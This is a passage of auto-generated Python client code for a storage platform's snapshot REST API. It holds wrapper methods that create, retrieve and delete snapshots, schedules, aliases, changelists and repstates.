If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_repstate'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_snapshot_repstate" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_repstate' is set
if ('snapshot_repstate' not in params or
params['snapshot_repstate'] is None):
raise ValueError("Missing the required parameter `snapshot_repstate` when calling `create_snapshot_repstate`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_repstate' in params:
body_params = params['snapshot_repstate']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/repstates', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateSnapshotRepstateResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_snapshot_schedule(self, snapshot_schedule, **kwargs): # noqa: E501
"""create_snapshot_schedule # noqa: E501
Create a new schedule. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_schedule(snapshot_schedule, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotScheduleCreateParams snapshot_schedule: (required)
:return: CreateSnapshotScheduleResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_snapshot_schedule_with_http_info(snapshot_schedule, **kwargs) # noqa: E501
else:
(data) = self.create_snapshot_schedule_with_http_info(snapshot_schedule, **kwargs) # noqa: E501
return data
def create_snapshot_schedule_with_http_info(self, snapshot_schedule, **kwargs): # noqa: E501
"""create_snapshot_schedule # noqa: E501
Create a new schedule. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_schedule_with_http_info(snapshot_schedule, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotScheduleCreateParams snapshot_schedule: (required)
:return: CreateSnapshotScheduleResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_schedule'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_snapshot_schedule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_schedule' is set
if ('snapshot_schedule' not in params or
params['snapshot_schedule'] is None):
raise ValueError("Missing the required parameter `snapshot_schedule` when calling `create_snapshot_schedule`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_schedule' in params:
body_params = params['snapshot_schedule']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/snapshot/schedules', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='CreateSnapshotScheduleResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_snapshot_snapshot(self, snapshot_snapshot, **kwargs): # noqa: E501
"""create_snapshot_snapshot # noqa: E501
Create a new snapshot. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_snapshot(snapshot_snapshot, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotSnapshotCreateParams snapshot_snapshot: (required)
:return: SnapshotSnapshotExtended
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_snapshot_snapshot_with_http_info(snapshot_snapshot, **kwargs) # noqa: E501
else:
(data) = self.create_snapshot_snapshot_with_http_info(snapshot_snapshot, **kwargs) # noqa: E501
return data
def create_snapshot_snapshot_with_http_info(self, snapshot_snapshot, **kwargs): # noqa: E501
"""create_snapshot_snapshot # noqa: E501
Create a new snapshot. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_snapshot_snapshot_with_http_info(snapshot_snapshot, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SnapshotSnapshotCreateParams snapshot_snapshot: (required)
:return: SnapshotSnapshotExtended
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_snapshot'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_snapshot_snapshot" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_snapshot' is set
if ('snapshot_snapshot' not in params or
params['snapshot_snapshot'] is None):
raise ValueError("Missing the required parameter `snapshot_snapshot` when calling `create_snapshot_snapshot`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'snapshot_snapshot' in params:
body_params = params['snapshot_snapshot']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/snapshots', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotSnapshotExtended', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_alias(self, snapshot_alias_id, **kwargs): # noqa: E501
"""delete_snapshot_alias # noqa: E501
Delete the snapshot alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_alias(snapshot_alias_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_alias_id: Delete the snapshot alias (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_alias_with_http_info(snapshot_alias_id, **kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_alias_with_http_info(snapshot_alias_id, **kwargs) # noqa: E501
return data
def delete_snapshot_alias_with_http_info(self, snapshot_alias_id, **kwargs): # noqa: E501
"""delete_snapshot_alias # noqa: E501
Delete the snapshot alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_alias_with_http_info(snapshot_alias_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_alias_id: Delete the snapshot alias (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_alias_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_alias_id' is set
if ('snapshot_alias_id' not in params or
params['snapshot_alias_id'] is None):
raise ValueError("Missing the required parameter `snapshot_alias_id` when calling `delete_snapshot_alias`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_alias_id' in params:
path_params['SnapshotAliasId'] = params['snapshot_alias_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/aliases/{SnapshotAliasId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_aliases(self, **kwargs): # noqa: E501
"""delete_snapshot_aliases # noqa: E501
Delete all or matching snapshot aliases. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_aliases(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_aliases_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_aliases_with_http_info(**kwargs) # noqa: E501
return data
def delete_snapshot_aliases_with_http_info(self, **kwargs): # noqa: E501
"""delete_snapshot_aliases # noqa: E501
Delete all or matching snapshot aliases. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_aliases_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_aliases" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/aliases', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_changelist(self, snapshot_changelist_id, **kwargs): # noqa: E501
"""delete_snapshot_changelist # noqa: E501
Delete the specified changelist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_changelist(snapshot_changelist_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_changelist_id: Delete the specified changelist. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_changelist_with_http_info(snapshot_changelist_id, **kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_changelist_with_http_info(snapshot_changelist_id, **kwargs) # noqa: E501
return data
def delete_snapshot_changelist_with_http_info(self, snapshot_changelist_id, **kwargs): # noqa: E501
"""delete_snapshot_changelist # noqa: E501
Delete the specified changelist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_changelist_with_http_info(snapshot_changelist_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_changelist_id: Delete the specified changelist. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_changelist_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_changelist" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_changelist_id' is set
if ('snapshot_changelist_id' not in params or
params['snapshot_changelist_id'] is None):
raise ValueError("Missing the required parameter `snapshot_changelist_id` when calling `delete_snapshot_changelist`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_changelist_id' in params:
path_params['SnapshotChangelistId'] = params['snapshot_changelist_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/changelists/{SnapshotChangelistId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_repstate(self, snapshot_repstate_id, **kwargs): # noqa: E501
"""delete_snapshot_repstate # noqa: E501
Delete the specified repstate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_repstate(snapshot_repstate_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_repstate_id: Delete the specified repstate. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_repstate_with_http_info(snapshot_repstate_id, **kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_repstate_with_http_info(snapshot_repstate_id, **kwargs) # noqa: E501
return data
def delete_snapshot_repstate_with_http_info(self, snapshot_repstate_id, **kwargs): # noqa: E501
"""delete_snapshot_repstate # noqa: E501
Delete the specified repstate. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_repstate_with_http_info(snapshot_repstate_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_repstate_id: Delete the specified repstate. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_repstate_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_repstate" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_repstate_id' is set
if ('snapshot_repstate_id' not in params or
params['snapshot_repstate_id'] is None):
raise ValueError("Missing the required parameter `snapshot_repstate_id` when calling `delete_snapshot_repstate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_repstate_id' in params:
path_params['SnapshotRepstateId'] = params['snapshot_repstate_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/repstates/{SnapshotRepstateId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_schedule(self, snapshot_schedule_id, **kwargs): # noqa: E501
"""delete_snapshot_schedule # noqa: E501
Delete the schedule. This does not affect already created snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_schedule(snapshot_schedule_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_schedule_id: Delete the schedule. This does not affect already created snapshots. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_schedule_with_http_info(snapshot_schedule_id, **kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_schedule_with_http_info(snapshot_schedule_id, **kwargs) # noqa: E501
return data
def delete_snapshot_schedule_with_http_info(self, snapshot_schedule_id, **kwargs): # noqa: E501
"""delete_snapshot_schedule # noqa: E501
Delete the schedule. This does not affect already created snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_schedule_with_http_info(snapshot_schedule_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_schedule_id: Delete the schedule. This does not affect already created snapshots. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_schedule_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_schedule" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_schedule_id' is set
if ('snapshot_schedule_id' not in params or
params['snapshot_schedule_id'] is None):
raise ValueError("Missing the required parameter `snapshot_schedule_id` when calling `delete_snapshot_schedule`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_schedule_id' in params:
path_params['SnapshotScheduleId'] = params['snapshot_schedule_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/snapshot/schedules/{SnapshotScheduleId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_schedules(self, **kwargs): # noqa: E501
"""delete_snapshot_schedules # noqa: E501
Delete all snapshot schedules. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_schedules(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_schedules_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_schedules_with_http_info(**kwargs) # noqa: E501
return data
def delete_snapshot_schedules_with_http_info(self, **kwargs): # noqa: E501
"""delete_snapshot_schedules # noqa: E501
Delete all snapshot schedules. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_schedules_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_schedules" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/3/snapshot/schedules', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_snapshot(self, snapshot_snapshot_id, **kwargs): # noqa: E501
"""delete_snapshot_snapshot # noqa: E501
Delete the snapshot. Deleted snapshots will be placed into a deleting state until the system can reclaim the space used by the snapshot. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_snapshot(snapshot_snapshot_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_snapshot_id: Delete the snapshot. Deleted snapshots will be placed into a deleting state until the system can reclaim the space used by the snapshot. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_snapshot_with_http_info(snapshot_snapshot_id, **kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_snapshot_with_http_info(snapshot_snapshot_id, **kwargs) # noqa: E501
return data
def delete_snapshot_snapshot_with_http_info(self, snapshot_snapshot_id, **kwargs): # noqa: E501
"""delete_snapshot_snapshot # noqa: E501
Delete the snapshot. Deleted snapshots will be placed into a deleting state until the system can reclaim the space used by the snapshot. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_snapshot_with_http_info(snapshot_snapshot_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_snapshot_id: Delete the snapshot. Deleted snapshots will be placed into a deleting state until the system can reclaim the space used by the snapshot. (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_snapshot_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_snapshot" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_snapshot_id' is set
if ('snapshot_snapshot_id' not in params or
params['snapshot_snapshot_id'] is None):
raise ValueError("Missing the required parameter `snapshot_snapshot_id` when calling `delete_snapshot_snapshot`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_snapshot_id' in params:
path_params['SnapshotSnapshotId'] = params['snapshot_snapshot_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/snapshots/{SnapshotSnapshotId}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_snapshot_snapshots(self, **kwargs): # noqa: E501
"""delete_snapshot_snapshots # noqa: E501
Delete all or matching snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_snapshots(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str type: Only list snapshots matching this type.
:param str schedule: Only list snapshots created by this schedule.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_snapshot_snapshots_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.delete_snapshot_snapshots_with_http_info(**kwargs) # noqa: E501
return data
def delete_snapshot_snapshots_with_http_info(self, **kwargs): # noqa: E501
"""delete_snapshot_snapshots # noqa: E501
Delete all or matching snapshots. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_snapshot_snapshots_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str type: Only list snapshots matching this type.
:param str schedule: Only list snapshots created by this schedule.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['type', 'schedule'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_snapshot_snapshots" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'type' in params:
query_params.append(('type', params['type'])) # noqa: E501
if 'schedule' in params:
query_params.append(('schedule', params['schedule'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/snapshots', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_snapshot_alias(self, snapshot_alias_id, **kwargs): # noqa: E501
"""get_snapshot_alias # noqa: E501
Retrieve snapshot alias information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_alias(snapshot_alias_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_alias_id: Retrieve snapshot alias information. (required)
:return: SnapshotAliases
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_snapshot_alias_with_http_info(snapshot_alias_id, **kwargs) # noqa: E501
else:
(data) = self.get_snapshot_alias_with_http_info(snapshot_alias_id, **kwargs) # noqa: E501
return data
def get_snapshot_alias_with_http_info(self, snapshot_alias_id, **kwargs): # noqa: E501
"""get_snapshot_alias # noqa: E501
Retrieve snapshot alias information. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_snapshot_alias_with_http_info(snapshot_alias_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str snapshot_alias_id: Retrieve snapshot alias information. (required)
:return: SnapshotAliases
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['snapshot_alias_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_snapshot_alias" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'snapshot_alias_id' is set
if ('snapshot_alias_id' not in params or
params['snapshot_alias_id'] is None):
raise ValueError("Missing the required parameter `snapshot_alias_id` when calling `get_snapshot_alias`") # noqa: E501
collection_formats = {}
path_params = {}
if 'snapshot_alias_id' in params:
path_params['SnapshotAliasId'] = params['snapshot_alias_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['basicAuth'] # noqa: E501
return self.api_client.call_api(
'/platform/1/snapshot/aliases/{SnapshotAliasId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SnapshotAliases', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
